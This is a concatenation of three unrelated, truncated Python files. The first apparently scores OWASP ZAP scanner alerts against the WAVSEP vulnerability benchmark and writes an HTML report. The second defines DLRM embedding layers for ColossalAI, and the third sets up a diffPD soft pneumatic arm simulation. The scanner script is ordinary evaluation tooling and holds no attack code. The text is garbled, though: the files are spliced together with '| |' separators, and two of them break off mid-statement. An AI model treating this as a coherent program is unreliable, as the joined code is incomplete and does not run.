zapHost = '127.0.0.1'
zapPort = '8090'
try:
opts, args = getopt.getopt(argv,"h:p:")
except getopt.GetoptError:
print 'wavsep.py -h <ZAPhost> -p <ZAPport>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
zapHost = arg
elif opt == '-p':
zapPort = arg
zapUrl = 'http://' + zapHost + ':' + zapPort
# Dictionary of abbreviation to keep the output a bit shorter
abbrev = {
'Active Vulnerability title' : 'Ex',\
'Cross Site Scripting (DOM Based)' : 'DXSS',\
'Cross Site Scripting (Reflected)' : 'RXSS',\
'Absence of Anti-CSRF Tokens' : 'NoCSRF',\
'Application Error Disclosure' : 'AppError',\
'Anti CSRF Tokens Scanner' : 'ACSRF',\
'Buffer Overflow' : 'Buffer',\
'Cookie set without HttpOnly flag' : 'HttpOnly',\
'Cookie Slack Detector' : 'CookieSlack',\
'Cross Site Request Forgery' : 'CSRF',\
'External Redirect' : 'ExtRedir',\
'Format String Error' : 'Format',\
'HTTP Parameter Override' : 'ParamOver',\
'Information disclosure - database error messages' : 'InfoDb',\
'Information disclosure - debug error messages' : 'InfoDebug',\
'Information Disclosure - Sensitive Informations in URL' : 'InfoUrl',\
'LDAP Injection' : 'LDAP',\
'Loosely Scoped Cookie' : 'CookieLoose',\
'None. Warning only.' : 'NoCSRF2',\
'Password Autocomplete in browser' : 'Auto',\
'Path Traversal' : 'PathTrav',\
'Private IP Disclosure' : 'PrivIP',\
'Remote File Inclusion' : 'RFI',\
'Session ID in URL Rewrite' : 'SessRewrite',\
'Source Code Disclosure - File Inclusion' : 'SrcInc',\
'SQL Injection' : 'SQLi',\
'SQL Injection - MySQL' : 'SqlMySql',\
'SQL Injection - Generic SQL RDBMS' : 'SqlGen',\
'SQL Injection - Boolean Based' : 'SqlBool',\
'SQL Injection - Error Based - Generic SQL RDBMS' : 'SqlGenE',\
'SQL Injection - Error Based - MySQL' : 'SqlMySqlE',\
'SQL Injection - Error Based - Java' : 'SqlJavaE',\
'SQL Injection - Hypersonic SQL - Time Based' : 'SqlHyperT',\
'SQL Injection - MySQL - Time Based' : 'SqlMySqlT',\
'SQL Injection - Oracle - Time Based' : 'SqlOracleT',\
'SQL Injection - PostgreSQL - Time Based' : 'SqlPostgreT',\
'URL Redirector Abuse' : 'UrlRedir',\
'Viewstate without MAC signature (Unsure)' : 'ViewstateNoMac',\
'Weak Authentication Method' : 'WeakAuth',\
'Web Browser XSS Protection Not Enabled' : 'XSSoff',\
'X-Content-Type-Options Header Missing' : 'XContent',\
'X-Frame-Options Header Not Set' : 'XFrame'}
# The rules to apply:
# Column 1: String to match against an alert URL
# Column 2: Alert abbreviation to match
# Column 3: pass, fail, ignore
#
rules = [ \
# All these appear to be valid ;)
['-', 'InfoDebug', 'ignore'], \
['-', 'InfoUrl', 'ignore'], \
['-', 'ACSRF', 'ignore'], \
['-', 'ACSRF', 'ignore'], \
['-', 'Ex', 'ignore'], \
['-', 'CookieLoose', 'ignore'], \
['-', 'CookieSlack', 'ignore'], \
['-', 'NoCSRF2', 'ignore'], \
['-', 'ParamOver', 'ignore'], \
['-', 'PrivIP', 'ignore'], \
['-', 'SrcInc', 'ignore'], \
['-', 'XFrame', 'ignore'], \
['-', 'XContent', 'ignore'], \
['-', 'XSSoff', 'ignore'], \
['LFI-', 'AppError', 'ignore'], \
['LFI-', 'Buffer', 'ignore'], \
['LFI-', 'Format', 'ignore'], \
['LFI-', 'NoCSRF', 'ignore'], \
['LFI-', 'RFI', 'ignore'], \
['LFI-', 'DXSS', 'ignore'], \
['LFI-', 'RXSS', 'ignore'], \
['LFI-', 'SqlHyperT', 'ignore'], \
['LFI-', 'SqlMySql', 'ignore'], \
['LFI-', 'SqlOracleT', 'ignore'], \
['LFI-', 'SqlPostgreT', 'ignore'], \
['Redirect-', 'LDAP', 'ignore'], \
['Redirect-', 'NoCSRF', 'ignore'], \
['Redirect-', 'RFI', 'ignore'], \
['Redirect-', 'DXSS', 'ignore'], \
['Redirect-', 'RXSS', 'ignore'], \
['Redirect-', 'SqlHyperT', 'ignore'], \
['Redirect-', 'SqlMySql', 'ignore'], \
['Redirect-', 'SqlOracleT', 'ignore'], \
['Redirect-', 'SqlPostgreT', 'ignore'], \
['RFI-', 'AppError', 'ignore'], \
['RFI-', 'Buffer', 'ignore'], \
['RFI-', 'Format', 'ignore'], \
['RFI-', 'NoCSRF', 'ignore'], \
['RFI-', 'DXSS', 'ignore'], \
['RFI-', 'RXSS', 'ignore'], \
['RFI-', 'SqlHyperT', 'ignore'], \
['RFI-', 'SqlMySql', 'ignore'], \
['RFI-', 'SqlOracleT', 'ignore'], \
['RFI-', 'SqlPostgreT', 'ignore'], \
['RXSS-', 'Auto', 'ignore'], \
['RXSS-', 'Buffer', 'ignore'], \
['RXSS-', 'Format', 'ignore'], \
['RXSS-', 'HttpOnly', 'ignore'], \
['RXSS-', 'NoCSRF', 'ignore'], \
['RXSS-', 'SqlOracleT', 'ignore'], \
['RXSS-', 'SqlPostgreT', 'ignore'], \
['RXSS-', 'SqlMySql', 'ignore'], \
['RXSS-', 'SqlOracleT', 'ignore'], \
['RXSS-', 'ViewstateNoMac', 'ignore'], \
['SInjection-', 'AppError', 'ignore'], \
['SInjection-', 'Auto', 'ignore'], \
['SInjection-', 'Buffer', 'ignore'], \
['SInjection-', 'NoCSRF', 'ignore'], \
['SInjection-', 'Format', 'ignore'], \
['SInjection-', 'LDAP', 'ignore'], \
['SInjection-', 'RXSS', 'ignore'], \
['SInjection-', 'SqlHyperT', 'ignore'], \
['LoginBypass', 'Auto', 'ignore'], \
['CrlfRemovalInHttpHeader', 'HttpOnly', 'ignore'], \
['Tag2HtmlPageScopeValidViewstateRequired', 'ViewstateNoMac', 'ignore'], \
['session-password-autocomplete', 'NoCSRF', 'ignore'], \
#
['LFI-Detection-Evaluation', 'PathTrav', 'pass'], \
['LFI-FalsePositives', 'PathTrav', 'fail'], \
['Redirect-', 'ExtRedir', 'pass'], \
['RFI-Detection-Evaluation', 'RFI', 'pass'], \
['RFI-FalsePositives', 'RFI', 'fail'], \
['RXSS-Detection-Evaluation', 'DXSS', 'pass'], \
['RXSS-Detection-Evaluation', 'RXSS', 'pass'], \
['RXSS-FalsePositives-GET', 'DXSS', 'fail'], \
['RXSS-FalsePositives-GET', 'RXSS', 'fail'], \
['SInjection-Detection-Evaluation', 'SQLfp', 'pass'], \
['SInjection-Detection-Evaluation', 'SQLi', 'pass'], \
#['SInjection-Detection-Evaluation', 'SqlHyper', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlBool', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlGen', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlGenE', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlMySql', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlMySqlE', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlMySqlT', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlOracleT', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlPostgreT', 'pass'], \
['SInjection-FalsePositives', 'SQLfp', 'fail'], \
['SInjection-FalsePositives', 'SQLi', 'fail'], \
['SInjection-FalsePositives', 'SqlBool', 'fail'], \
['SInjection-FalsePositives', 'SqlGen', 'fail'], \
['SInjection-FalsePositives', 'SqlGenE', 'fail'], \
['SInjection-FalsePositives', 'SqlMySql', 'fail'], \
['SInjection-FalsePositives', 'SqlMySqlE', 'fail'], \
['SInjection-FalsePositives', 'SqlMySqlT', 'fail'], \
['SInjection-FalsePositives', 'SqlHyperT', 'fail'], \
['SInjection-FalsePositives', 'SqlMySqlT', 'fail'], \
['SInjection-FalsePositives', 'SqlOracleT', 'fail'], \
['SInjection-FalsePositives', 'SqlPostgreT', 'fail'], \
['info-cookie-no-httponly', 'HttpOnly', 'pass'], \
['info-server-stack-trace', 'AppError', 'pass'], \
['session-password-autocomplete', 'Auto', 'pass'], \
['weak-authentication-basic', 'WeakAuth', 'pass'], \
]
zap = ZAPv2(proxies={'http': zapUrl, 'https': zapUrl})
uniqueUrls = set([])
# alertsPerUrl is a disctionary of urlsummary to a dictionary of type to set of alertshortnames ;)
alertsPerUrl = {}
plugins = set([])
alertPassCount = {}
alertFailCount = {}
alertIgnoreCount = {}
alertOtherCount = {}
zapVersion = zap.core.version
totalAlerts = 0
offset = 0
page = 100
# Page through the alerts as otherwise ZAP can hang...
alerts = zap.core.alerts('', offset, page)
while len(alerts) > 0:
totalAlerts += len(alerts)
for alert in alerts:
url = alert.get('url')
# Grab the url before any '?'
url = url.split('?')[0]
#print 'URL: ' + url
urlEl = url.split('/')
if (len(urlEl) > 6):
#print 'URL 4:' + urlEl[4] + ' 6:' + urlEl[6].split('-')[0]
if (urlEl[3] != 'wavsep'):
print 'Ignoring non wavsep URL 4:' + urlEl[4] + ' URL 5:' + urlEl[5] + ' URL 6:' + urlEl[6]
continue
if (urlEl[6].split('-')[0][:9] == 'index.jsp'):
#print 'Ignoring index URL 4:' + urlEl[4] + ' URL 5:' + urlEl[5] + ' URL 6:' + urlEl[6]
continue
if (len(urlEl) > 7 and urlEl[4] == 'active'):
if (urlEl[7].split('-')[0][:4] != 'Case'):
#print 'Ignoring index URL 4:' + urlEl[4] + ' URL 5:' + urlEl[5] + ' URL 6:' + urlEl[6] + ' URL 7:' + urlEl[7]
continue
urlSummary = urlEl[4] + ' : ' + urlEl[5] + ' : ' + urlEl[6] + ' : ' + urlEl[7].split('-')[0]
else:
# Passive URLs have different format
urlSummary = urlEl[4] + ' : ' + urlEl[5] + ' : ' + urlEl[6]
#print 'URL summary:' + urlSummary
short = abbrev.get(alert.get('alert'))
if (short is None):
short = 'UNKNOWN'
print 'Unknown alert: ' + alert.get('alert')
aDict = alertsPerUrl.get(urlSummary, {'pass' : set([]), 'fail' : set([]), 'ignore' : set([]), 'other' : set([])})
added = False
for rule in rules:
if (rule[0] in urlSummary and rule[1] == short):
aDict[rule[2]].add(short)
# Counts per alert
if (rule[2] == 'pass'):
alertPassCount[short] = alertPassCount.get(short, 0) + 1
elif (rule[2] == 'fail'):
alertFailCount[short] = alertFailCount.get(short, 0) + 1
elif (rule[2] == 'ignore'):
alertIgnoreCount[short] = alertIgnoreCount.get(short, 0) + 1
added = True
break
if (not added):
aDict['other'].add(short)
alertOtherCount[short] = alertOtherCount.get(short, 0) + 1
alertsPerUrl[urlSummary] = aDict
plugins.add(alert.get('alert'))
uniqueUrls.add(url)
offset += page
alerts = zap.core.alerts('', offset, page)
#for key, value in alertsPerUrl.iteritems():
# print key, value
# Generate report file
reportFile = open('report.html', 'w')
reportFile.write("<html>\n")
reportFile.write(" <head>\n")
reportFile.write(" <title>ZAP Wavsep Report</title>\n")
reportFile.write(" <!--Load the AJAX API-->\n")
reportFile.write(" <script type=\"text/javascript\" src=\"https://www.google.com/jsapi\"></script>\n")
reportFile.write(" </head>\n")
reportFile.write("<body>\n")
reportFile.write("<h1><img src=\"https://raw.githubusercontent.com/zaproxy/zaproxy/develop/src/resource/zap64x64.png\" align=\"middle\">OWASP ZAP wavsep results</h1>\n")
reportFile.write("Generated: " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M") + "\n")
topResults = []
thisTop = ['', 0, 0]
groupResults = []
thisGroup = ['', 0, 0]
totalPass = 0
totalFail = 0
# Calculate the top level scores
for key, value in sorted(alertsPerUrl.iteritems()):
top = key.split(' : ')[1]
if ('-' in top):
top = top.split('-')[0] + '-' + top.split('-')[1]
if (top != thisTop[0]):
thisTop = [top, 0, 0] # top, pass, fail
topResults.append(thisTop)
if (len(value.get('pass')) > 0):
thisTop[1] += 1
elif (len(value.get('fail')) > 0):
thisTop[2] += 1
elif ('FalsePositive' in key):
thisTop[1] += 1
else:
thisTop[2] += 1
# Calculate the group scores
for key, value in sorted(alertsPerUrl.iteritems()):
group = key.split(' : ')[1]
if (group != thisGroup[0]):
thisGroup = [group, 0, 0] # group, pass, fail
groupResults.append(thisGroup)
if (len(value.get('pass')) > 0):
totalPass += | |
<gh_stars>0
from __future__ import absolute_import, division, print_function, unicode_literals
# For distributed run
import extend_distributed as ext_dist
# numpy
import numpy as np
import sys
# pytorch
import torch
from torch._ops import ops
from torch.autograd.profiler import record_function
from torch.nn.parallel.parallel_apply import parallel_apply
from torch.nn.parallel.replicate import replicate
from torch.nn.parallel.scatter_gather import gather, scatter
from torch.nn.parameter import Parameter
import torch.nn as nn
import torch.nn.functional as F
import colossalai
def md_solver(n, alpha, d0=None, B=None, round_dim=True, k=None):
'''
An external facing function call for mixed-dimension assignment
with the alpha power temperature heuristic
Inputs:
n -- (torch.LongTensor) ; Vector of num of rows for each embedding matrix
alpha -- (torch.FloatTensor); Scalar, non-negative, controls dim. skew
d0 -- (torch.FloatTensor); Scalar, baseline embedding dimension
B -- (torch.FloatTensor); Scalar, parameter budget for embedding layer
round_dim -- (bool); flag for rounding dims to nearest pow of 2
k -- (torch.LongTensor) ; Vector of average number of queries per inference
'''
n, indices = torch.sort(n)
k = k[indices] if k is not None else torch.ones(len(n))
d = alpha_power_rule(n.type(torch.float) / k, alpha, d0=d0, B=B)
if round_dim:
d = pow_2_round(d)
undo_sort = [0] * len(indices)
for i, v in enumerate(indices):
undo_sort[v] = i
return d[undo_sort]
def alpha_power_rule(n, alpha, d0=None, B=None):
if d0 is not None:
lamb = d0 * (n[0].type(torch.float) ** alpha)
elif B is not None:
lamb = B / torch.sum(n.type(torch.float) ** (1 - alpha))
else:
raise ValueError("Must specify either d0 or B")
d = torch.ones(len(n)) * lamb * (n.type(torch.float) ** (-alpha))
for i in range(len(d)):
if i == 0 and d0 is not None:
d[i] = d0
else:
d[i] = 1 if d[i] < 1 else d[i]
return (torch.round(d).type(torch.long))
def pow_2_round(dims):
return 2 ** torch.round(torch.log2(dims.type(torch.float)))
class PrEmbeddingBag(nn.Module):
def __init__(self, num_embeddings, embedding_dim, base_dim):
super(PrEmbeddingBag, self).__init__()
self.embs = nn.EmbeddingBag(
num_embeddings, embedding_dim, mode="sum", sparse=True)
torch.nn.init.xavier_uniform_(self.embs.weight)
if embedding_dim < base_dim:
self.proj = nn.Linear(embedding_dim, base_dim, bias=False)
torch.nn.init.xavier_uniform_(self.proj.weight)
elif embedding_dim == base_dim:
self.proj = nn.Identity()
else:
raise ValueError(
"Embedding dim " + str(embedding_dim) + " > base dim " + str(base_dim)
)
def forward(self, input, offsets=None, per_sample_weights=None):
return self.proj(self.embs(
input, offsets=offsets, per_sample_weights=per_sample_weights))
class QREmbeddingBag(nn.Module):
r"""Computes sums or means over two 'bags' of embeddings, one using the quotient
of the indices and the other using the remainder of the indices, without
instantiating the intermediate embeddings, then performs an operation to combine these.
For bags of constant length and no :attr:`per_sample_weights`, this class
* with ``mode="sum"`` is equivalent to :class:`~torch.nn.Embedding` followed by ``torch.sum(dim=0)``,
* with ``mode="mean"`` is equivalent to :class:`~torch.nn.Embedding` followed by ``torch.mean(dim=0)``,
* with ``mode="max"`` is equivalent to :class:`~torch.nn.Embedding` followed by ``torch.max(dim=0)``.
However, :class:`~torch.nn.EmbeddingBag` is much more time and memory efficient than using a chain of these
operations.
QREmbeddingBag also supports per-sample weights as an argument to the forward
pass. This scales the output of the Embedding before performing a weighted
reduction as specified by ``mode``. If :attr:`per_sample_weights`` is passed, the
only supported ``mode`` is ``"sum"``, which computes a weighted sum according to
:attr:`per_sample_weights`.
Known Issues:
Autograd breaks with multiple GPUs. It breaks only with multiple embeddings.
Args:
num_categories (int): total number of unique categories. The input indices must be in
0, 1, ..., num_categories - 1.
embedding_dim (list): list of sizes for each embedding vector in each table. If ``"add"``
or ``"mult"`` operation are used, these embedding dimensions must be
the same. If a single embedding_dim is used, then it will use this
embedding_dim for both embedding tables.
num_collisions (int): number of collisions to enforce.
operation (string, optional): ``"concat"``, ``"add"``, or ``"mult". Specifies the operation
to compose embeddings. ``"concat"`` concatenates the embeddings,
``"add"`` sums the embeddings, and ``"mult"`` multiplies
(component-wise) the embeddings.
Default: ``"mult"``
max_norm (float, optional): If given, each embedding vector with norm larger than :attr:`max_norm`
is renormalized to have norm :attr:`max_norm`.
norm_type (float, optional): The p of the p-norm to compute for the :attr:`max_norm` option. Default ``2``.
scale_grad_by_freq (boolean, optional): if given, this will scale gradients by the inverse of frequency of
the words in the mini-batch. Default ``False``.
Note: this option is not supported when ``mode="max"``.
mode (string, optional): ``"sum"``, ``"mean"`` or ``"max"``. Specifies the way to reduce the bag.
``"sum"`` computes the weighted sum, taking :attr:`per_sample_weights`
into consideration. ``"mean"`` computes the average of the values
in the bag, ``"max"`` computes the max value over each bag.
Default: ``"mean"``
sparse (bool, optional): if ``True``, gradient w.r.t. :attr:`weight` matrix will be a sparse tensor. See
Notes for more details regarding sparse gradients. Note: this option is not
supported when ``mode="max"``.
Attributes:
weight (Tensor): the learnable weights of each embedding table is the module of shape
`(num_embeddings, embedding_dim)` initialized using a uniform distribution
with sqrt(1 / num_categories).
Inputs: :attr:`input` (LongTensor), :attr:`offsets` (LongTensor, optional), and
:attr:`per_index_weights` (Tensor, optional)
- If :attr:`input` is 2D of shape `(B, N)`,
it will be treated as ``B`` bags (sequences) each of fixed length ``N``, and
this will return ``B`` values aggregated in a way depending on the :attr:`mode`.
:attr:`offsets` is ignored and required to be ``None`` in this case.
- If :attr:`input` is 1D of shape `(N)`,
it will be treated as a concatenation of multiple bags (sequences).
:attr:`offsets` is required to be a 1D tensor containing the
starting index positions of each bag in :attr:`input`. Therefore,
for :attr:`offsets` of shape `(B)`, :attr:`input` will be viewed as
having ``B`` bags. Empty bags (i.e., having 0-length) will have
returned vectors filled by zeros.
per_sample_weights (Tensor, optional): a tensor of float / double weights, or None
to indicate all weights should be taken to be ``1``. If specified, :attr:`per_sample_weights`
must have exactly the same shape as input and is treated as having the same
:attr:`offsets`, if those are not ``None``. Only supported for ``mode='sum'``.
Output shape: `(B, embedding_dim)`
"""
__constants__ = ['num_categories', 'embedding_dim', 'num_collisions',
'operation', 'max_norm', 'norm_type', 'scale_grad_by_freq',
'mode', 'sparse']
def __init__(self, num_categories, embedding_dim, num_collisions,
operation='mult', max_norm=None, norm_type=2.,
scale_grad_by_freq=False, mode='mean', sparse=False,
_weight=None):
super(QREmbeddingBag, self).__init__()
assert operation in ['concat', 'mult', 'add'], 'Not valid operation!'
self.num_categories = num_categories
if isinstance(embedding_dim, int) or len(embedding_dim) == 1:
self.embedding_dim = [embedding_dim, embedding_dim]
else:
self.embedding_dim = embedding_dim
self.num_collisions = num_collisions
self.operation = operation
self.max_norm = max_norm
self.norm_type = norm_type
self.scale_grad_by_freq = scale_grad_by_freq
if self.operation == 'add' or self.operation == 'mult':
assert self.embedding_dim[0] == self.embedding_dim[1], \
'Embedding dimensions do not match!'
self.num_embeddings = [int(np.ceil(num_categories / num_collisions)),
num_collisions]
if _weight is None:
self.weight_q = Parameter(torch.Tensor(self.num_embeddings[0], self.embedding_dim[0]))
self.weight_r = Parameter(torch.Tensor(self.num_embeddings[1], self.embedding_dim[1]))
self.reset_parameters()
else:
assert list(_weight[0].shape) == [self.num_embeddings[0], self.embedding_dim[0]], \
'Shape of weight for quotient table does not match num_embeddings and embedding_dim'
assert list(_weight[1].shape) == [self.num_embeddings[1], self.embedding_dim[1]], \
'Shape of weight for remainder table does not match num_embeddings and embedding_dim'
self.weight_q = Parameter(_weight[0])
self.weight_r = Parameter(_weight[1])
self.mode = mode
self.sparse = sparse
def reset_parameters(self):
nn.init.uniform_(self.weight_q, np.sqrt(1 / self.num_categories))
nn.init.uniform_(self.weight_r, np.sqrt(1 / self.num_categories))
def forward(self, input, offsets=None, per_sample_weights=None):
input_q = (input / self.num_collisions).long()
input_r = torch.remainder(input, self.num_collisions).long()
embed_q = F.embedding_bag(input_q, self.weight_q, offsets, self.max_norm,
self.norm_type, self.scale_grad_by_freq, self.mode,
self.sparse, per_sample_weights)
embed_r = F.embedding_bag(input_r, self.weight_r, offsets, self.max_norm,
self.norm_type, self.scale_grad_by_freq, self.mode,
self.sparse, per_sample_weights)
if self.operation == 'concat':
embed = torch.cat((embed_q, embed_r), dim=1)
elif self.operation == 'add':
embed = embed_q + embed_r
elif self.operation == 'mult':
embed = embed_q * embed_r
return embed
def extra_repr(self):
s = '{num_embeddings}, {embedding_dim}'
if self.max_norm is not None:
s += ', max_norm={max_norm}'
if self.norm_type != 2:
s += ', norm_type={norm_type}'
if self.scale_grad_by_freq is not False:
s += ', scale_grad_by_freq={scale_grad_by_freq}'
s += ', mode={mode}'
return s.format(**self.__dict__)
### define dlrm in Colossalai ###
class DLRM_Net(nn.Module):
def create_mlp(self, ln, sigmoid_layer):
# build MLP layer by layer
layers = nn.ModuleList()
for i in range(0, ln.size - 1):
n = ln[i]
m = ln[i + 1]
# construct fully connected operator
LL = colossalai.nn.Linear(int(n), int(m), bias=True)
# initialize the weights
# with torch.no_grad():
# custom Xavier input, output or two-sided fill
mean = 0.0 # std_dev = np.sqrt(variance)
std_dev = np.sqrt(2 / (m + n)) # np.sqrt(1 / m) # np.sqrt(1 / n)
W = np.random.normal(mean, std_dev, size=(m, n)).astype(np.float32)
std_dev = np.sqrt(1 / m) # np.sqrt(2 / (m + 1))
bt = np.random.normal(mean, std_dev, size=m).astype(np.float32)
# approach 1
LL.weight.data = torch.tensor(W, requires_grad=True)
LL.bias.data = | |
<reponame>srl-ethz/diffPD_sim2real
# ------------------------------------------------------------------------------
# AC2 Design Environment
# ------------------------------------------------------------------------------
import sys
sys.path.append('../')
from pathlib import Path
import time
import os
import pickle
from argparse import ArgumentParser
from PIL import Image, ImageDraw, ImageFont
import shutil
import numpy as np
import scipy.optimize
import trimesh
from py_diff_pd.common.common import ndarray, create_folder, print_info,delete_folder
from py_diff_pd.common.project_path import root_path
from py_diff_pd.env.env_base import EnvBase
from py_diff_pd.common.renderer import PbrtRenderer
from py_diff_pd.core.py_diff_pd_core import StdRealVector, HexMesh3d, HexDeformable, TetMesh3d, TetDeformable
from py_diff_pd.common.hex_mesh import generate_hex_mesh, voxelize, hex2obj
from py_diff_pd.common.display import render_hex_mesh, export_gif, export_mp4
from py_diff_pd.common.tet_mesh import tetrahedralize, generate_tet_mesh, read_tetgen_file
from py_diff_pd.common.tet_mesh import get_contact_vertex as get_tet_contact_vertex
from py_diff_pd.common.hex_mesh import get_contact_vertex as get_hex_contact_vertex
class ArmEnv(EnvBase):
def __init__(self, seed, folder, options):
EnvBase.__init__(self, folder)
np.random.seed(seed)
create_folder(folder, exist_ok=True)
stlFile = "./STL_files/arm180k.stl"
youngs_modulus = options['youngs_modulus'] if 'youngs_modulus' in options else 1e6
poissons_ratio = options['poissons_ratio'] if 'poissons_ratio' in options else 0.45
state_force_parameters = options['state_force_parameters'] if 'state_force_parameters' in options else ndarray([0.0, 0.0, -9.81])
refinement = options['refinement'] if 'refinement' in options else 1
material = options['material'] if 'material' in options else 'none'
mesh_type = options['mesh_type'] if 'mesh_type' in options else 'tet'
assert mesh_type in ['tet', 'hex'], "Invalid mesh type!"
actuator_parameters = options['actuator_parameters'] if 'actuator_parameters' in options else ndarray([
np.log10(2) + 5
])
# Mesh parameters.
la = youngs_modulus * poissons_ratio / ((1 + poissons_ratio) * (1 - 2 * poissons_ratio))
mu = youngs_modulus / (2 * (1 + poissons_ratio))
density = 1.07e3
### Create Mesh
tmp_bin_file_name = '.tmp.bin'
if mesh_type == 'tet':
from py_diff_pd.common.tet_mesh import tetrahedralize, generate_tet_mesh, get_boundary_face
verts, eles = tetrahedralize(stlFile, normalize_input=False,
options={
'minratio': 1.0,
#'maxvolume': 1.0
}
)
generate_tet_mesh(verts, eles, tmp_bin_file_name)
mesh = TetMesh3d()
deformable = TetDeformable()
elif mesh_type == 'hex':
from py_diff_pd.common.hex_mesh import voxelize, generate_hex_mesh, get_boundary_face
dx = 0.1 / refinement
origin = ndarray([0., 0., 0.]) # Set the origin in visualization
# Voxelize by default normalizes the output, input_normalization is the factor to multiply all vertices by to recover original lengths
voxels, input_normalization = voxelize(stlFile, dx, normalization_factor=True)
generate_hex_mesh(voxels, dx*input_normalization, origin, tmp_bin_file_name)
mesh = HexMesh3d()
deformable = HexDeformable()
mesh.Initialize(tmp_bin_file_name)
mesh.Scale(scale_factor=0.001) # Rescale mesh from millimeters to meters
deformable.Initialize(mesh.vertices(), mesh.elements(), density, material, youngs_modulus, poissons_ratio)
os.remove(tmp_bin_file_name)
### Transformations
vert_num = mesh.NumOfVertices()
verts = ndarray([ndarray(mesh.py_vertex(i)) for i in range(vert_num)])
# Rotate along x by 90 degrees.
R = ndarray([
[1, 0, 0],
[0, 0, -1],
[0, 1, 0]
])
verts = verts @ R.T
min_corner = np.min(verts, axis=0)
max_corner = np.max(verts, axis=0)
self._obj_center = (max_corner+min_corner)/2
## 4 Points we will track on hex mesh
# Define the position of these points
self.target_hex =[
[0,self._obj_center[1],0],
[2*self._obj_center[0],self._obj_center[1],0],
[self._obj_center[0],0,0],
[self._obj_center[0], 2*self._obj_center[1],0]
]
self.target_idx_hex = []
# Find the points on the mesh
for point in self.target_hex:
norm=np.linalg.norm(verts-point, axis=1)
self.target_idx_hex.append(int(np.argmin(norm)))
def target_idx_hex():
return self.target_idx_hex
# Translate XY plane to origin. Height doesn't really matter here
verts += [-self._obj_center[0], -self._obj_center[1], 0.]
min_corner_after = np.min(verts, axis=0)
max_corner_after = np.max(verts, axis=0)
### Boundary conditions: Glue vertices spatially
self.min_z_nodes = []
for i in range(vert_num):
vx, vy, vz = verts[i]
if abs(vz - min_corner[2]) < 1e-3:
self.min_z_nodes.append(i)
if abs(vz - max_corner[2]) < 1e-3:
deformable.SetDirichletBoundaryCondition(3 * i, vx)
deformable.SetDirichletBoundaryCondition(3 * i + 1, vy)
deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
#Define target points of QTM
self.target_points=[
[0.0214436, 0.005746, 0.],
[0.0093821, -0.02012, 0.],
[-0.01569777, -0.01569777, 0.],
[-0.0201200, 0.0093821, 0.],
[-0.04312, 0.02828, 0.102],
[0.0141, -0.0573, 0.102],
[-0.05231, -0.01909, 0.102],
[-0.02121, -0.05019, 0.102]
]
# Tip point index that we want to track
self.target_idx_tip_front = []
norm=np.linalg.norm(verts-self.target_points[2], axis=1)
self.target_idx_tip_front.append(int(np.argmin(norm)))
def target_idx_tip_front():
return self.target_idx_tip_front
# All motion marker of the tip
self.target_idx = []
for point in self.target_points[:4]:
norm=np.linalg.norm(verts-point, axis=1)
self.target_idx.append(int(np.argmin(norm)))
def target_idx(self):
return self.target_idx
# For defining forces on inner surface (just the chamber walls, each of the 4 separate)
self._inner_faces = [[],[],[],[]]
faces = get_boundary_face(mesh)
# Approximately how thick the walls are (inner square walls are a little thicker at 2.27mm)
wall_width = 2.03e-3
def belongs_inner_chamber (face_vertices):
"""
Returns True or False based on whether a face (defined by its vertices) is part of the inner chamber.
(In default orientation) The inner shape is a rounded square that is rotated in a diagonal fashion. So now we have a diamond shape, the equation for the diamond is |x| + |y| = 10.11mm and as the radius of the whole cylinder is about 22.22mm, we can set everything in between as the inner surface (assuming we centered the object in the xy-plane).
At the bottom there is some intrusions, the bottom section is about 6.93mm thick, so we disregard that part when applying pressure.
"""
res = (
# Should exclude outer wall
(np.linalg.norm(face_vertices[:,:2], axis=1) < 22.22e-3 - wall_width/2).all()
# Should exclude inner wall
and (np.sum(abs(face_vertices[:,:2]), axis=1) > 10.11e-3 + wall_width/2).all()
# Exclude upper and lower surfaces
and (abs(face_vertices[:,2] - max_corner[2]) > 1e-3).any()
and (abs(face_vertices[:,2] - min_corner[2]) > 6.93e-3 - wall_width/2).all()
)
return res
for f in faces:
face_vertices = verts.take(f, axis=0)
if belongs_inner_chamber(face_vertices):
# Check which chamber it belongs to:
# Conventional quadrants: 0 (+; +), 1 (−; +), 2 (−; −), and 3 (+; −)
# If a face is inbetween, it just goes somewhere, though we don't care as it isn't part of the chambers.
if (np.prod(face_vertices[:,:2], axis=1) > 0).all():
if (face_vertices[:,0] > 0).any():
self._inner_faces[0].append(f)
else:
self._inner_faces[2].append(f)
else:
if (face_vertices[:,0] > 0).any():
self._inner_faces[3].append(f)
else:
self._inner_faces[1].append(f)
# State-based forces.
deformable.AddStateForce('gravity', state_force_parameters)
if material == 'none':
# For corotated material
deformable.AddPdEnergy('corotated', [2 * mu,], [])
deformable.AddPdEnergy('volume', [la,], [])
# Initial state
dofs = deformable.dofs()
q0 = np.copy(verts)
q0 = q0.ravel()
v0 = ndarray(np.zeros(dofs)).ravel()
f_ext = ndarray(np.zeros(dofs)).ravel()
# Data members.
self._deformable = deformable
self._q0 = q0
self._v0 = v0
self._f_ext = f_ext
self._youngs_modulus = youngs_modulus
self._poissons_ratio = poissons_ratio
self._state_force_parameters = state_force_parameters
self._stepwise_loss = False
self.__loss_q_grad = np.random.normal(size=dofs)
self.__loss_v_grad = np.random.normal(size=dofs)
self.__spp = options['spp'] if 'spp' in options else 4
self._mesh_type = mesh_type
def _display_mesh(self, mesh_file, file_name, qs_real, i):
# Size of the bounding box: [-0.06, -0.05, 0] - [0.06, 0.05, 0.14]
options = {
'file_name': file_name,
'light_map': 'uffizi-large.exr',
'sample': self.__spp,
'max_depth': 2,
'camera_pos': (0.8, -0.8, 1.1), # Position of camera
'camera_lookat': (0, 0, .28) # Position that camera looks at
}
renderer = PbrtRenderer(options)
transforms = [
('s', 4),
('t', [-self._obj_center[0], -self._obj_center[1], 0.1])
]
if isinstance(mesh_file, tuple) or self._mesh_type == 'tet':
mesh = TetMesh3d()
mesh.Initialize(mesh_file[0] if isinstance(mesh_file, tuple) else mesh_file)
renderer.add_tri_mesh(
mesh,
color='0096c7',
transforms=transforms,
render_tet_edge=True,
)
